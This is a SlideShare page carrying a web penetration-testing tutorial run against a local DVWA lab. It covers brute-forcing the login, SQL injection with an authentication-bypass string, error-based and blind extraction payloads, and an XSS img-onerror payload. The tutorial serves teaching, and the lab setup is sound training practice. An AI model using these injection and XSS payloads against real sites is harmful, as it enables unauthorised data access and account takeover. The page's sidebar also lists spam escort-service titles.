SlideShare une entreprise Scribd logo

The practice of web application penetration testing

_
_U2_

The practice of web application penetration testing. How to build test environment, how to use brute force tool, how to execute SQL Injection, Cross site Scripting etc.

Technologie
1  sur  11
Télécharger pour lire hors ligne
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing target. First, you need build a test environment for yourself. If you are not good at building servers, we recommend you build a simple one with XAMPP. OS: Windows 7, 8 Software: XAMPP for Windows, download: https://www.apachefriends.org/zh_cn/index.html XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default installation path is c:xampp, please do not change it. Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and access with http://127.0.0.1 . After started, you can use the following command to set the password to 123456 (This is a weak password, just for example, please modify it) C:xamppmysqlbinmysqladmin -u root password 123456 Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to C:xampphtdocsdvwa, Then modify its configuration file, which is C:xampphtdocsdvwaconfigconfig.inc.php: $_DVWA[ 'db_server' ] = 'localhost'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = ‘123456’; $_DVWA['default_security_level'] = "low"; Open http://127.0.0.1/dvwa/setup.php , Click ”Create/Reset Database” to finish the installation. Access the front page of it and it will redirect to http://127.0.0.1/DVWA/login.php Now, a basic test environment is available. 2. DVWA Brute Force The first challenge of DVWA is how to login it. Usually, you can search the network and get the default username/password, or try to use SQL Injection to escape the authentication mechanism, such as use a username like admin’;-- or other ways. Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3 (http://www.janusec.com/ ) as a brute force tool. First, input any username and password, such as 123, 456, etc. submit.
Switch to Resend tab: We found there was a request list which includes requests we submit just now. Note that there is a button “Bruter”, click it, it will switch to Bruter tool. The username and password field has been identified automatically. The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom modifying.
Click “Go” to start guess process, result will be list in the window. Log in with the username and password. 3. SQL Injection Select “SQL Injection” menu, input 1 and submit: Input 1’ to try:
MySQL throw exception because of unpaired single quotes. Now, we can suspect that there is SQL Injection vulnerability here. Continue try 1 and 1=1 and 1 and 1=2 But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue try with 1' and '1'='1 and 1' and '1'='2
There is no result return to us when we input 1’ and ‘1’=’2 Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap : Criterion of SQL Injection Assume the initial response is Response0, Response by append true logic is Response1, Response by append false logic is Response2, If Response1= Response0, but Response1 != Response2, SQL Injection exists. OK, can you takeover some data by exploiting it?
Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x)a)%23 Well, the database name “dvwa” returns on the page. This case is a little complex; actually it builds an exception intentionally by twice rand computation. Another way is blind SQL Injection, by guest the length and ASCII of each byte of the field. To compute if the length of database name bigger than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1 Wrong, try less than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))<10 and '1'='1
Right, continue guess till: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1 We got the length is 4. Continue to guess each byte of it: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)) )=100 and %271%27=%271
The ASCII of the first byte is 100, it is d, and so on. http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of database is “dvwa” . Is there a tool which can do these tests instead? Yes, we can use a web application security scanner to do it. Take WebCruiser as an illustration, navigate page and click “ScanURL”: SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
continue click ”Get Environment Information”: 4. XSS Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/ Input text and script directly in the title and content field, such as: testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.
Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated vulnerability type (setting) or designated URL (ScanURL button) separately.

Recommandé

Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentationZara Joe
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Html web workers
Html web workersHtml web workers
Html web workersAbhishekMondal42
 
Struts database access
Struts database accessStruts database access
Struts database accessAbass Ndiaye
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership Database( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership DatabaseLiquidHub
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
 

Recommandé

Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentationZara Joe
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Html web workers
Html web workersHtml web workers
Html web workersAbhishekMondal42
 
Struts database access
Struts database accessStruts database access
Struts database accessAbass Ndiaye
 
XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership Database( 15 ) Office 2007 Create A Membership Database
( 15 ) Office 2007 Create A Membership DatabaseLiquidHub
 
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
 
Session handling in codeigniter
Session handling in codeigniterSession handling in codeigniter
Session handling in codeigniterbaabtra.com - No. 1 supplier of quality freshers
 
Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injectionMickey Jack
 
POWER OF VISUALIZATION
POWER OF VISUALIZATIONPOWER OF VISUALIZATION
POWER OF VISUALIZATIONsihleGumede3
 
Js unit testing
Js unit testingJs unit testing
Js unit testingMihail Irintchev
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions
 
Server Sent Events
Server Sent EventsServer Sent Events
Server Sent EventsMohanad Obaid
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Cake php
Cake phpCake php
Cake phpJyotisankar Pradhan
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4Abhishek Kesharwani
 
Installation of Joomla on Windows XP
Installation of Joomla on Windows XPInstallation of Joomla on Windows XP
Installation of Joomla on Windows XPRupesh Kumar
 
Introduction about-ajax-framework
Introduction about-ajax-frameworkIntroduction about-ajax-framework
Introduction about-ajax-frameworkSakthi Bro
 
Protecting against injections at scale
Protecting against injections at scaleProtecting against injections at scale
Protecting against injections at scaleSqreen
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4Abhishek Kesharwani
 
jQuery basics
jQuery basicsjQuery basics
jQuery basicsKamal S
 
Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Magdalena Paciorek
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Asp
AspAsp
AspAdil Jafri
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injectionKagi Adrian Zinelli
 

Contenu connexe

Tendances

Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injectionMickey Jack
 
POWER OF VISUALIZATION
POWER OF VISUALIZATIONPOWER OF VISUALIZATION
POWER OF VISUALIZATIONsihleGumede3
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Installation of Joomla on Windows XP
Installation of Joomla on Windows XPInstallation of Joomla on Windows XP
Installation of Joomla on Windows XPRupesh Kumar
 
Introduction about-ajax-framework
Introduction about-ajax-frameworkIntroduction about-ajax-framework
Introduction about-ajax-frameworkSakthi Bro
 
Protecting against injections at scale
Protecting against injections at scaleProtecting against injections at scale
Protecting against injections at scaleSqreen
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
jQuery basics
jQuery basicsjQuery basics
jQuery basicsKamal S
 
Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Magdalena Paciorek
 

Tendances (17)

Session handling in codeigniter
Session handling in codeigniterSession handling in codeigniter
Session handling in codeigniter
 
Remote code-with-expression-language-injection
Remote code-with-expression-language-injectionRemote code-with-expression-language-injection
Remote code-with-expression-language-injection
 
POWER OF VISUALIZATION
POWER OF VISUALIZATIONPOWER OF VISUALIZATION
POWER OF VISUALIZATION
 
Js unit testing
Js unit testingJs unit testing
Js unit testing
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Server Sent Events
Server Sent EventsServer Sent Events
Server Sent Events
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQL
 
Cake php
Cake phpCake php
Cake php
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4
 
Installation of Joomla on Windows XP
Installation of Joomla on Windows XPInstallation of Joomla on Windows XP
Installation of Joomla on Windows XP
 
Introduction about-ajax-framework
Introduction about-ajax-frameworkIntroduction about-ajax-framework
Introduction about-ajax-framework
 
Protecting against injections at scale
Protecting against injections at scaleProtecting against injections at scale
Protecting against injections at scale
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Unit 2.4
Unit 2.4Unit 2.4
Unit 2.4
 
jQuery basics
jQuery basicsjQuery basics
jQuery basics
 
Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017Digging into WordPress custom fields - WordCamp Brno 2017
Digging into WordPress custom fields - WordCamp Brno 2017
 

Similaire à The practice of web application penetration testing

Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionAhmed AbdelSatar
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Resilience Testing
Resilience Testing Resilience Testing
Resilience Testing Ran Levy
 
Open Script (OATS)
Open Script (OATS)Open Script (OATS)
Open Script (OATS)Anurag Deb
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Hongyang Wang
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development PracticesBrandon Dove
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIAguestfdcb8a
 
Sql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian AlexandrescuSql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian AlexandrescuCristian Alexandrescu
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousFrancis Alexander
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersoazabir
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggyPVS-Studio
 

Similaire à The practice of web application penetration testing (20)

Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Asp
AspAsp
Asp
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Resilience Testing
Resilience Testing Resilience Testing
Resilience Testing
 
Open Script (OATS)
Open Script (OATS)Open Script (OATS)
Open Script (OATS)
 
Web Security
Web SecurityWeb Security
Web Security
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)
 
Secure WordPress Development Practices
Secure WordPress Development PracticesSecure WordPress Development Practices
Secure WordPress Development Practices
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
Sql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian AlexandrescuSql injection course made by Cristian Alexandrescu
Sql injection course made by Cristian Alexandrescu
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
 

Dernier

Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 

Dernier (20)

Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 

The practice of web application penetration testing

  • 1. The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other’s web sites as your testing target. First, you need build a test environment for yourself. If you are not good at building servers, we recommend you build a simple one with XAMPP. OS: Windows 7, 8 Software: XAMPP for Windows, download: https://www.apachefriends.org/zh_cn/index.html XAMPP for Windows has modules such as Apache, PHP, Tomcat, and MySQL etc. The default installation path is c:xampp, please do not change it. Take DVWA (Damn Vulnerable Web Application) as an example, Start Apache and MySQL, and access with http://127.0.0.1 . After started, you can use the following command to set the password to 123456 (This is a weak password, just for example, please modify it) C:xamppmysqlbinmysqladmin -u root password 123456 Now, you can download DVWA from https://github.com/RandomStorm/DVWA , unzip it to C:xampphtdocsdvwa, Then modify its configuration file, which is C:xampphtdocsdvwaconfigconfig.inc.php: $_DVWA[ 'db_server' ] = 'localhost'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root';
  • 2. $_DVWA[ 'db_password' ] = ‘123456’; $_DVWA['default_security_level'] = "low"; Open http://127.0.0.1/dvwa/setup.php , Click ”Create/Reset Database” to finish the installation. Access the front page of it and it will redirect to http://127.0.0.1/DVWA/login.php Now, a basic test environment is available. 2. DVWA Brute Force The first challenge of DVWA is how to login it. Usually, you can search the network and get the default username/password, or try to use SQL Injection to escape the authentication mechanism, such as use a username like admin’;-- or other ways. Here we will use brute force, and use WebCruiser Web Vulnerability Scanner 3 (http://www.janusec.com/ ) as a brute force tool. First, input any username and password, such as 123, 456, etc. submit.
  • 3. Switch to Resend tab: We found there was a request list which includes requests we submit just now. Note that there is a button “Bruter”, click it, it will switch to Bruter tool. The username and password field has been identified automatically. The dictionary files are located in the same directory with WebCruiserWVS.exe and supports custom modifying.
  • 4. Click “Go” to start guess process, result will be list in the window. Log in with the username and password. 3. SQL Injection Select “SQL Injection” menu, input 1 and submit: Input 1’ to try:
  • 5. MySQL throw exception because of unpaired single quotes. Now, we can suspect that there is SQL Injection vulnerability here. Continue try 1 and 1=1 and 1 and 1=2 But we found it is not the same as expected, SQL Injection with integer type was ruled out. Continue try with 1' and '1'='1 and 1' and '1'='2
  • 6. There is no result return to us when we input 1’ and ‘1’=’2 Till now, we can adjudge there is SQL Injection vulnerability with string type here. Recap : Criterion of SQL Injection Assume the initial response is Response0, Response by append true logic is Response1, Response by append false logic is Response2, If Response1= Response0, but Response1 != Response2, SQL Injection exists. OK, can you takeover some data by exploiting it?
